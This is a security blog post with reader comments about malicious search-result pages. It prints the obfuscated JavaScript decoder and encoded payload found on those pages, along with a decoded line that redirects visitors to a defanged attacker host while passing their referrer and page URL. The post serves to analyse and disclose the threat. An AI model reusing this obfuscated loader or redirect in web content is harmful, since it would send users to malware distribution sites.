Skip navigation.
Home

More malicious search results

One of my co-workers just learned that there is a malicious html page with his name on it! When I downloaded the page down we realized that it was not a targetted attack, but a variant of the malicious pages I reported under my MSN malicious results post.

This server actually had 3179 other html pages, each one with a name starting with Ryan-. The bad guys probably used a robot to collect information from web pages. More information here...

The script looks like the one reported before:

function zrwe(yry,dtj){if(!dtj){dtj=’SDedpfE96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0′;}var y;var OR=”;for(var vadz=0;vadz16,(y&65280)>>8,y&255);}eval(OR.substring(0,OR.length-3));}zrwe(’2X-uHEPBVIlctXfWNhPuzhJutXP}HJJKKKLTN9vWod&cVB2B2bmcyIl3yIJ}HRv-tBrutXPAVX-uVIF+N4.Bw+vGNG*82hlmVRvsoXQWVR6gFT*3Hda*VRrlke*ctI.gNTHW1RD-zhjIoXJcoIJIzK6?HhmnyXv-JJwwrXPAoEPuHhmWCEvctBJAHhmWV+w-HIJboIJbCKQTw+DsoIfAHRv-onW}NXJm2XPbHeHGH4W}oX;I2R6PaKH6JfvrR*wfv}JKvJ6P6TA-yIFcHEJJ;}-dyX*jyXm-y+r&HEPn2h*-y+ruJJwaCKQTwIv-HIf*y9v{NXJm2XPbHd*thfLTC4QL6eSL6SSS’);

have you

Tried to deobfuscate this yet ?

V.

And it translates into:

window.location=encodeURI(”hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref=”+encodeURIComponent(document.referrer)+”¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=”+encodeURIComponent(document.URL)+”&default_keyword=XXX”);

See the full post here

Nice!

Nice! is there an obfuscation engine? If it is, have you got the link?
Would you post the cached link from google?
Oh, hey ! This IS the engine! Isn't it?
pls try: http://blog.grospolina.net/archives/6-MSN-cache-hilft-beim-Verbreiten-von-malware.html
it's in german but i hope you will acknowledge, that's same thing we were talking about.

Big Tanks for posting this article.

---
"Vernichte ihn! Er ist nur ein USER!" (MCP)

redirection engine?

well, i tried htgp://www.onlinedetect.com/in.cgi?545&muuh

and i received:

Error: 'can't open redirects.log file'

head:
HTTP/1.1 200 OK
Date: Wed, 30 Jul 2008 01:50:37 GMT
Server: Apache/2.2.8 (Fedora)
Connection: close
Content-Type: text/plain; charset=UTF-8

interesting thing.?
---
"Vernichte ihn! Er ist nur ein USER!" (MCP)